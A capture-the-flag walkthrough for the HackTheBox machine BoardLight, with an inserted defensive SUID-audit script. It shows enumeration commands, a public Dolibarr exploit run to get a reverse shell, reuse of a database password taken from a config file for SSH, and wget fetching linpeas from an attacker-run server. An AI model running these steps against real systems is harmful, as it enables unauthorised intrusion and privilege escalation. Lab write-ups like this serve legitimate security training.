BoardLight HTB Walkthrough

BoardLight is an easy HackTheBox Linux machine. In this writeup we’re going to capture the user flag through a vulnerable CRM, then enumerate the OS for privilege escalation and capture the root flag.

1- Nmap Result :

22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))

We have to add “board.htb” to our “/etc/hosts” file, and after that, let’s scan for any subdomains:

$ gobuster vhost -u http://board.htb -w /usr/share/wordlists/subdomains-top1million-5000.txt --append-domain

crm.board.htb

That’s great, we found a subdomain. After adding crm.board.htb to “/etc/hosts”, we can open it in our browser and see that it’s the Dolibarr CRM.

2- Exploitation and User Flag

After that, we can easily log in with the “admin:admin” credentials, but after a lot of time spent, I found nothing.

We can search on Google for “Dolibarr Exploit” and we will find “CVE-2023-30253”, with a PoC on this link to get a reverse shell: https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253

$ python exploit.py  http://crm.board.htb admin admin YOUR_IP YOUR_PORT

Finally, we have our reverse shell as the user www-data, but we can’t capture the user flag, and there’s a user directory named “larissa” that I suspect has what we’re looking for.

After enumerating Dolibarr files, we found an interesting file :

$ cat /var/www/html/crm.board.htb/htdocs/conf/conf.php

$dolibarr_main_db_pass='serverfun2$2023!!';

The config file contains a database password that I used to SSH in as larissa and capture our User flag!

3- PrivEsc and Root Flag

For this part, I usually run the linpeas.sh script, which you can download from this link.

To run linpeas.sh on the target machine, follow these steps:

$ cd LINPEAS_LOCATION_ON_YOUR_MACHINE    # on your machine: folder containing linpeas.sh
$ php -S 0.0.0.0:80                      # on your machine: serve this folder over HTTP
$ wget http://YOUR_IP/linpeas.sh         # on the target: download linpeas.sh
$ chmod 777 linpeas.sh                   # on the target: give linpeas permission to execute
$ ./linpeas.sh                           # on the target: execute the linpeas.sh script


╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwsr-xr-x 1 root root 15K Jul  8  2019 /usr/lib/eject/dmcrypt-get-device
-rwsr-sr-x 1 root root 15K Apr  8 18:36 /usr/lib/xorg/Xorg.wrap
-rwsr-xr-x 1 root root 27K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight (Unknown SUID binary!)

Enlightenment is a Window Manager, Compositor and Minimal Desktop for Linux. There was a zero-day vulnerability in it, “CVE-2022-37706”, and I found a good exploit to use on this link to get the Root Flag.
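On the defending side, the “Unknown SUID binary!” entries that linpeas flags above are what a baseline audit of setuid/setgid files would surface before an attacker does. The following is an added example, not part of the original walkthrough; the baseline paths and the function names `find_setid` and `audit` are assumptions.

```python
import os
import stat

# Assumed baseline of reviewed setuid/setgid paths (hypothetical; build the real
# one from a known-good image of the host).
BASELINE = {"/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/su", "/usr/bin/mount"}


def find_setid(root):
    """Yield (path, lstat result) for regular files under root with setuid/setgid set."""
    for dirpath, _dirs, files in os.walk(root, onerror=lambda err: None):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: never follow symlinks
            except OSError:
                continue  # file vanished or is unreadable
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                yield path, st


def audit(root, baseline):
    """Return setuid/setgid files under root that are not in the baseline."""
    findings = []
    for path, st in find_setid(root):
        if path in baseline:
            continue
        findings.append({
            "path": path,
            "mode": stat.filemode(st.st_mode),  # e.g. -rwsr-xr-x
            "uid": st.st_uid,                   # 0 means the binary runs as root
            "world_writable": bool(st.st_mode & stat.S_IWOTH),
        })
    return sorted(findings, key=lambda f: f["path"])


if __name__ == "__main__":
    # Report every setuid/setgid file under /usr that nobody has reviewed yet.
    for f in audit("/usr", BASELINE):
        print(f["mode"], f["uid"], f["path"])
```

Run on a schedule and alert on any new finding; a desktop component such as the Enlightenment helpers on a server would show up here as soon as the package was installed.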

Finally! We managed to hack this easy Linux machine. I hope you do so too while enjoying following these steps.

If you have any questions or details to add, please feel free to contact me here.